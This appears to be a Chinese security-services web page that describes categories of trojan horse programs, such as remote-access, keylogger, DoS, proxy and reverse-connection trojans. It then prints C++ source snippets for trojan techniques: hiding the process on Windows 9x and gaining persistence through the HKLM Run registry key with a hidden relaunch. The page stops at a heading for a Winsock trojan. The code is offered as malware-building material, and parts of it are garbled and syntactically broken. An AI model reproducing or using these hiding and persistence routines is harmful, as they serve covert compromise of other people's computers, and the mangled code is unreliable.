网络安全检测|网络安全服务|网络安全扫描-香港墨客投资移动版

远程访问型木马程序一般包括客户端程序和服务端程序，在目标主机上执行了服务端程序之后，只要用户知道目标主机的IP地址或主机名，就可以与目标主机连接，连接成功后，用户通过客户端程序提供的远程操作功能就可以实现对目标主机的监视与控制。

大名鼎鼎的木马冰河就是一个远程访问型特洛伊木马。

4）键盘记录木马

记录目标主机用户的键盘操作且将键盘操作记录在文件中，入侵者可以获取这些文件并在文件中获取诸如密码等有用的信息。

对于这种类型的木马，邮件发送功能也是必不可少的。

5）Dos攻击木马

Dos全名是Denial of service（拒绝服务）。它故意攻击网络协议的缺陷或直接通过某种手段耗尽被攻击对象的资源，目的是让目标计算机或网络无法提供正常的服务或资源访问，使目标系统服务停止响应甚至崩溃。

当黑客侵入一台计算机并种上了DOS攻击木马后，日后这台计算机就成了黑客DOS攻击的最得力的帮手。黑客控制的计算机数量越多，发动DOS攻击取得成功的概率就越大，所以，这种木马的危害不是体现在被感染的计算机上，而是体现在攻击者可以利用它来攻击网络上的其他的计算机。

全名是 ()，很多攻击源一起攻击某台服务器就组成了DDOS攻击。

6）代理木马

给被控制的肉鸡种上代理木马，让其变成入侵者发动攻击的跳板就是代理木马最重要的任务。通过代理木马，入侵者可以在匿名的情况下使用Telnet等程序，从而隐蔽自己的踪迹。

7）FTP木马

这种木马可能是最简单和古老的木马了，它的惟一功能就是打开21端口，等待用户连接。现在新FTP木马还加上了密码功能，这样，只有攻击者本人才知道正确的密码，从而进入对方的计算机。

8）程序杀手木马

常见的查杀木马软件有瑞星，Norton Anti-Virus及木马清除大师等。程序杀手木马的功能就是关闭目标机器上运行的木马查杀程序，让木马更好地发挥作用。

9）反弹端口型木马

木马开发者在分析了防火墙的特性后发现 ：防火墙对于连入的链接往往会进行非常严格的过滤，但是对于连出的链接却疏于防范。

于是，与一般的木马相反，反弹端口型木马在服务端 (被控制端)使用主动端口，客户端 (控制端)使用被动端口。

木马定时监测客户端（控制端）的存在，发现客户端（控制端）上线立即主动连接控制端打开的主动端口；

为了隐蔽起见，客户端 (控制端)的被动端口一般设置为80（浏览网页必须开的端口），这样，即使用户使用端口扫描软件检查自己的端口，发现的也是类似TCP UserIP:1026 ControllerIP:80 ESTABLISHED的情况，不明真相的用户就会以为自己在浏览网页，并且，防火墙一般不会禁止用户向外连接80端口。

主流木马：

1、 木马中的关键技术实现（附源码）

1) 木马程序隐藏技术

通过注册服务程序，实现进程伪隐藏的方法：

WINAPI WinMain(HINSTANCE, HINSTANCE, LPSTR, int) { try { DWORD dwVersion = GetVersion();//取得Windows的版本号 if (dwVersion >= 0x80000000) // Windows 9x隐藏任务列表 { int (CALLBACK *rsp)(DWORD,DWORD); HINSTANCE dll=LoadLibrary("KERNEL32.DLL");//装入KERNEL32.DLL rsp=(int(CALLBACK *)(DWORD,DWORD))GetProcAddress(dll,"RegisterServiceProcess");//找到RegisterServiceProcess的入口 rsp(NULL,1);//注册服务 FreeLibrary(dll);//释放DLL模块 } } catch (Exception &exception)//处理异常事件 { //处理异常事件 } return 0; }　

2) 程序的自启动运行技术

展示一段通过修改HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersions/Run键值来实现自启动的程序：

HKEY hkey; AnsiString NewProgramName=AnsiString(sys) AnsiString(" PName/">//") PName unsigned long k; k=REG_OPENED_EXISTING_KEY; RegCreateKeyEx(HKEY_LOCAL_MACHINE, "SOFTWARE//MICROSOFT//WINDOWS//CURRENTVERSION//RUN//", 0L, NULL, REG_OPTION_NON_VOLATILE,KEY_ALL_ACCESS|KEY_SET_VALUE, NULL, &hkey,&k); RegSetValueEx(hkey, "BackGroup", 0, REG_SZ, NewProgramName.c_str(), NewProgramName.Length()); RegCloseKey(hkey); if (int(ShellExecute(Handle, "open", NewProgramName.c_str(), NULL, NULL, SW_HIDE))>32) { WantClose=true; Close(); } else { HKEY hkey; unsigned long k; k=REG_OPENED_EXISTING_KEY; long a=RegCreateKeyEx(HKEY_LOCAL_MACHINE, "SOFTWARE//MICROSOFT//WINDOWS//CURRENTVERSION//RUN", 0, NULL, REG_OPTION_NON_VOLATILE, KEY_SET_VALUE,NULL, &hkey,&k); RegSetValueEx(hkey, "BackGroup", 0, REG_SZ, ProgramName.c_str(), ProgramName.Length()); int num=0; char str[20]; DWORD lth=20; DWORD type; char strv[255]; DWORD vl=254; DWORD Suc; do{ Suc=RegEnumValue(HKEY_LOCAL_MACHINE, (DWORD)num,str, NULL, &type, strv,&vl); if (strcmp(str,"BGroup")==0) { DeleteFile(AnsiString(strv)); RegDeleteValue(HKEY_LOCAL_MACHINE,"BGroup"); break; } }while(Suc== ERROR_SUCCESS); RegCloseKey(hkey); }

2、 WINSOCK编程完成一个简单"木马程序"实现（附源码）